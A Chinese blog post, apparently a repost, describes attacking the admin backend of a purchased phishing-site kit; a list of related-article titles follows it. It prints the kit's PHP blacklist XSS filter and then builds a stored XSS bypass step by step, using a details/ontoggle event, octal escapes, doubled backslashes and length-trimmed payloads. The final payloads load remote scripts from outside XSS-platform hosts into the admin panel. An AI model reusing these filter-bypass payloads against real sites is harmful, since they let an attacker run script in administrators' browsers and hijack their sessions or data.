这种类型的钓鱼网站最少有上百个了~我风在指尖今天要为民除害~~~

自己伪装成买家,花了150,从黑市买到这种钓鱼源码,开始进行研究

钓鱼站是这样的

看他的源码,我们得知,有专门的一个脚本用来过滤我们的XSS过滤xss 脚本如下

[AppleScript]纯文本查看复制代码
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<?PHP
function RemoveXSS($val) {
              //==========================//
            //                          //
            //随风 程序开发 QQ957223651 //
            //      此类用来防止XSS     //
            //==========================//
   $val = preg_replace('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '', $val);
   $search = 'abcdefghijklmnopqrstuvwxyz';
   $search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
   $search .= '1234567890!@#$%^&*()';
   $search .= '~`";:?+/={}[]-_|\'\\';
   for ($i = 0; $i < strlen($search); $i++) {
      $val = preg_replace('/(&#[xX]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val);
      $val = preg_replace('/({0,8}'.ord($search[$i]).';?)/', $search[$i], $val);
   }
   $ra1 = Array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base');
   $ra2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload');
   $ra = array_merge($ra1, $ra2);
   $found = true;
   while ($found == true) {
      $val_before = $val;
      for ($i = 0; $i < sizeof($ra); $i++) {
         $pattern = '/';
         for ($j = 0; $j < strlen($ra[$i]); $j++) {
            if ($j > 0) {
               $pattern .= '(';
               $pattern .= '(&#[xX]0{0,8}([9ab]);)';
               $pattern .= '|';
               $pattern .= '|(&#{0,8}([9|10|13]);)';
               $pattern .= ')*';
            }
            $pattern .= $ra[$i][$j];
         }
         $pattern .= '/i';
         $replacement = substr($ra[$i], 0, 2).'<x>'.substr($ra[$i], 2);
         $val = preg_replace($pattern, $replacement, $val);
         if ($val_before == $val) {
            $found = false;
         }
      }
   }
   return $val;
}
?>

我们可以看到,能过滤的事件基本上都被对方过滤了

但是,像这种黑名单肯定都有不完善的地方没错
<details open="" οntοggle=alert``>他没有过滤ontoggle事件并且也没过滤eval函数那么我们可以构造恶意代码最常用的的写上

[AppleScript]纯文本查看复制代码
?
1
</TD><details open ontoggle=eval("\141\154\145\162\164\140\140")>

</Td> 是闭合标签,这里我们用了js8编码 \141\154\145\162\164\140\140 就是alert``  转换后的代码放入到对面查看试试然后我们伪造成被钓鱼者,在钓鱼页面提交数据,把我们的payload插入到对方的 p12345变量中

然后我们进入到后台查看,却没有弹窗,这是为什么呢?

对其->右击->使用firebug 查看元素看看为什么不能弹窗

对比查看
完整的代码

[AppleScript]纯文本查看复制代码
?
1
</TD><details open ontoggle=eval("\141\154\145\162\164\140\140")>

过滤后的代码
[AppleScript]纯文本查看复制代码
?
1
<details open=""141154145162164140140")">  </details>

\ 过滤了那么我们加两重绕过试试

[AppleScript]纯文本查看复制代码
?
1
</TD><details open ontoggle=eval("\\141\\154\\145\\162\\164\\140\\140")>

这段代码插进去试试看

进入后台
成功弹窗,现在我们可以尝试引用自己站点的代码了。。。。。。。。。。。。。。。

源代码应该为
[AppleScript]纯文本查看复制代码
?
1
</TD><details open ontoggle=eval(var s=document.createElement('script');s.src='http://xss.tv/XA';document.body.appendChild(s);)>

直接放上去是不行的,我们要对其编码,使用JS8编码
[AppleScript]纯文本查看复制代码
?
1
</TD><details open ontoggle=eval("\166\141\162\40\163\75\144\157\143\165\155\145\156\164\56\143\162\145\141\164\145\105\154\145\155\145\156\164\50\47\163\143\162\151\160\164\47\51\73\163\56\163\162\143\75\47\150\164\164\160\72\57\57\170\163\163\56\164\166\57\130\101\47\73\144\157\143\165\155\145\156\164\56\142\157\144\171\56\141\160\160\145\156\144\103\150\151\154\144\50\163\51\73")>

然后把\改成\\ 绕过对方的过滤规则

[AppleScript]纯文本查看复制代码
?
1
</TD><details open ontoggle=eval("\\166\\141\\162\\40\\163\\75\\144\\157\\143\\165\\155\\145\\156\\164\\56\\143\\162\\145\\141\\164\\145\\105\\154\\145\\155\\145\\156\\164\\50\\47\\163\\143\\162\\151\\160\\164\\47\\51\\73\\163\\56\\163\\162\\143\\75\\47\\150\\164\\164\\160\\72\\57\\57\\170\\163\\163\\56\\164\\166\\57\\130\\101\\47\\73\\144\\157\\143\\165\\155\\145\\156\\164\\56\\142\\157\\144\\171\\56\\141\\160\\160\\145\\156\\144\\103\\150\\151\\154\\144\\50\\163\\51\\73")>

但是当我放上去的时候,并没有写到数据库,也就是说把我这里的代码过滤了,到这里我百思不得其解,后来经过上百次测试,才知道,它限制的字符的长度,超过一定长度的字符,那么数据就不会被写入

那么只能不断的裁剪,不编码最终代码为
[AppleScript]纯文本查看复制代码
?
1
<details open ontoggle=document.body.appendChild(document.createElement("scr"+"ipt")).src="http://www.baidu.com">

“ 是闭合掉前面的标签

<details open οntοggle=document.body.appendChild(document.createElement("scr"+"ipt")).src="http://www.baidu.com"> 是引用我们XSS站点的代码,对方没有过滤doucmnet,只过滤了script
现在我们插入试试

依然没有成功执行,在继续看看对方的源码

将其复制出来,看看到底是什么原因

首先script标签被打乱了,并且多了个” 号,这很好绕过

前面我们看到过对方对JS8进制过滤不严格 可以对其JS8进制编码

我们再继续构造,把script转换成8进制,并且加上两个\\ 绕过对方过滤规则

[AppleScript]纯文本查看复制代码
?
1
"<details/open/ontoggle=document.body.appendChild(document.createElement('\\163\\143\\162\\151\\160\\164')).src='http://www.baidu.com'>

script转换成JS8进制编码
把所有的” 号换成’ 号

这样构造

结果后台没有存储任何数据

后来经过别人指点才知道,  默认输入’单引号会被过滤,我们只能在’单引号前面加上\

最终的代码就是

[AppleScript]纯文本查看复制代码
?
1
"<details/open/ontoggle=document.body.appendChild(document.createElement(\'\\163\\143\\162\\151\\160\\164\')).src=\'http://xss.sssie.com/FMD27h\'>

然后自己进入后台查看~

转载于:https://www.cnblogs.com/ichunqiu/p/7262799.html

攻破黑市最流行的钓鱼网站相关推荐

  1. 攻破黑市之拿下吃鸡,DNF钓鱼站群(结局彩蛋)

    i春秋作家:风在指尖 前段时间有个网友给我发了个网址,说找到个专门做钓鱼网站的连接,让我看看,然后就引出了下面的一系列事件 http://mfnyongshihuigui.jiebao8.top

  2. 如何知道一个网站的后台地址_看我如何攻破LOL钓鱼网站后台查清背后的大量账号被盗号的真相...

    说英雄联盟准备出手游,但内测资格一直没公开,有骗子利用这个机会,伪造官方给用户发送带有钓鱼链接的邮件来盗号.. 方子就是其中一个受害者,除了他,我也去了英雄联盟的贴吧看了下,确实有很多人收到了这类邮件 ...

  3. 交易劫持、钓鱼网站、盗号***严重威胁网购安全

    网上购物,钱怎么流进骗子的口袋了?最近我一直在琢磨这个问题. 互联网发展到现在,已经不再是网络游戏一家独大的时候,前几年一般人说上网,无非是在线游戏.而现在,非常多的网民尝试过在线购物,用淘宝.支付宝 ...

  4. 五种方法教你鉴别山寨、欺诈和钓鱼网站

    互联网的发展给我们购物.存取款以及与周围的人交流的方式都带来了很多极其便利的进步.然而与此同时,层出不穷的各种山寨.欺诈和钓鱼网站也带来了新的风险--针对那些毫无防范的人,犯罪分子有了新的犯罪途径:网 ...

  5. 天道有轮回!网络诈骗之国尼日利亚政府网站被挂钓鱼网站

    今天愚人节,然而. 上面这个是我无误了. 那么今天为了应景,就来聊聊和骗人相关的: 尼日利亚骗局 作为了一个商务电邮欺诈攻击(BEC)盛行之国:尼日利亚,号称拥有全球规模最大的鱼叉攻击类黑客组织,甚至 ...

  6. 最近工商银行钓鱼网站井喷式增长,过年了小心被钓鱼

    [size=medium] 近日,有关机构监测发现,金融钓鱼网站数量在近两个月出现了加速增长的趋势,针对工商银行的钓鱼网站更是在短短3天内增加了40个.这些钓鱼网站在界面和域名上高度模仿银行官方网站, ...

  7. 五大技巧识别钓鱼网站

    网上购物和网上银行凭借其便捷性和通达性,在互联网上日渐流行.在互联网上,你可以随时进行转账汇款或进行交易.据艾瑞咨询发布<2008-2009年中国网上支付行业发展报告>显示:中国互联网支付 ...

  8. 【WEB安全】轻松检测钓鱼网站的技巧

    你可能会认为钓鱼网站很难检测和跟踪,但实际上,许多钓鱼网站都包含唯一标识它们的HTML片段. 你可能会认为钓鱼网站很难检测和跟踪,但实际上,许多钓鱼网站都包含唯一标识它们的HTML片段.本文就以英国皇 ...

  9. [网络安全自学篇] 四十二.DNS欺骗和钓鱼网站原理详解及防御机理

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了中间人攻击或ARP欺骗攻击,从ARP原理到局域网配置进行描述.这篇文章 ...

最新文章

  1. Google、Facebook、亚马逊、Uber等硅谷顶尖AI专家团北京聚首 ,这场AI开发者盛会不可错过
  2. 程序员头发失踪之谜 | 每日趣闻
  3. c语言构造插值多项式,拉格朗日多项式插值(C语言).docx
  4. Unity—AssetBundle的打包及四种加载资源方式
  5. ASP.NET Core分布式项目实战(集成ASP.NETCore Identity)--学习笔记
  6. 8086和8088微处理器之间的区别
  7. linux+tux游戏,Linux吉祥物游戏SuperTux 0.5.0版发布 类《超级马里奥兄弟》
  8. onvif协议client与server对接
  9. 模型ks_风控建模 模型指标篇
  10. Dedecms文件夹目录解释完整版
  11. Atitit postgresql data type 数据类型与mysql对应表 数据库常用数据类型 Postgre Mysql 整数 intgreter Int 小数 numeric FL
  12. loadrunner11的安装
  13. Java编译器 iOS_Java编译器
  14. Android广告平台
  15. 如何用Python下载百度指数的数据
  16. js批量删除微博教程
  17. MySQL-压缩包版本下载安装
  18. 低碳环保+变废为宝=马铃薯淀粉生产废水处理设备
  19. 服务器之间如何传输数据
  20. 待定系数法求不定积分中的待定系数法的拆分总结

热门文章

  1. IROS 2021 | PTT:把Transformer应用到3D点云目标跟踪任务
  2. java从入门到精通陈丹丹_五子棋设计报告.doc
  3. 【5G】UE开关飞行模式信令变化流程分析
  4. js 数组操作 以固定位数 为一组 循环数组
  5. 乡村“蔬菜快递”直供饭店
  6. C++获取(32位)Kernel32 LoadLibrary等地址,并写入txt文件
  7. 提高自己网站人气的25条建议
  8. 初始SQL语句 简单使用
  9. 四角号码查询器手机版
  10. Linux-saltstack-4 jinjia模板得基本使用